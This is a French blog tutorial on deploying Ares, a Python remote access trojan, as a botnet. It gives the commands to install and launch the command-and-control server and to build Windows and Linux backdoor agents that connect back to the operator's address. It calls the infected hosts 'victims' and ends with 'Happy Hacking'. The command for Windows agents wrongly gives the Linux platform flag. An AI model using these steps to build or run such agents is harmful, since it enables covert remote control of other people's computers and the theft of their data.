Comment contrôler un botnet avec Ares ?

By | January 8, 2018

Ares est un outil RAT écrit en Python qui peut être utilisé pour contrôler à distance plusieurs hôtes simultanément.
Cet outil est notamment composé de deux programmes:
_ Un serveur de commande et contrôle (C&C), qui est une interface graphique Web pour l’administration des agents (victimes),
_ un agent (ou backdoor), qui est exécuté sur l’hôte compromis assurant la communication avec le serveur C&C.
Dans ce billet, nous verrons comment utiliser Ares.

Installation

Pour installer Ares, clonez son repo Github:

# git clone https://github.com/sweetsoftware/Ares.git

Puis, installez les dépendances:

# cd ares
# pip install -r requirements

Ensuite, initialisez une base de données:

# cd server
# ./ares.py initdb

Pour la compilation des agents Windows, installez Wine à l’aide du script wine_setup.sh:

# ./wine-setup.sh

Exemple d’utilisation

Pour démarrer le serveur C&C, lancez le script ares.py situé dans le dossier ares/server comme suit:

# ./ares.py runserver -h 0.0.0.0 -p 8080 –threaded

Ouvrez votre naviguateur web puis connectez vous à l’adresse:

http://localhost:8080

Pour votre première connexion, il vous faudra créer un mot de passe.

Connectez-vous avec votre mot de passe…

…Et vous accéderez au menu d’accueil.

Passons à présent à la création des agents à l’aide du script builder.py situé dans le dossier ares/agent.
Pour créer un agent Windows, lancez la commande suivante:

# ./builder.py -p Linux –server http://adresse-ip-server:8080 -o nom-du-fichier-de-sortie

Pour la création d’un agent Linux, lancez la commande ci-dessous:

# ./builder.py -p Linux –server http://adresse-ip-server:8080 -o nom-du-fichier-de-sortie -p pour le type de plateforme,
–server pour l’adresse d’écoute,
-o pour le nom du fichier de sortie.

Après l’exécution des agents par les victimes, vous verrez apparaître dans le menu Agents de votre serveur C&C une liste des systèmes infectés:

Lancez la commande help consulter la liste des commandes disponibles.

Vous serez en mesure de réaliser plusieurs choses, comme une capture de l’écran de votre victime, un upload d’un script, et bien d’autres…

Happy Hacking !

mdestroy

Leave a Reply

Your email address will not be published. Required fields are marked *